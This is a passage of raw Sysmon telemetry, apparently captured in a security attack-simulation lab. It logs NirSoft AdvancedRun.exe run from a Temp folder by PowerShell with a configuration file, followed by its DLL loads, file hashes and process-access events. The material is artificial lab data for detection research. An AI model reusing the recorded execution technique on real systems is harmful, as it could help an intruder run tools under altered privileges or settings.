1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004075224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.009{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004074336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:01.536{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 734700x80000000000000004074288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:56.438{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\edputil.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=913C76FC95CE8167FAB1E55D697F3B7B,SHA256=9D82F63627DCD5F186CC60A48B412A03DFA8C6FB63426A892A110751966390A7trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004074266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.443{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.442{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.441{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.441{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.441{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.439{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.438{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.429{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.427{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.421{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.421{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.421{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.420{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004074241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.229{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.220{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.118{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.109{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.110{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.110{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.065{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.073{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004074148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.093{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004074147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.093{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004074146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.092{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004074145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.082{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004074128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.076{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.047{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.053{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.052{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.052{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.052{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.051{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 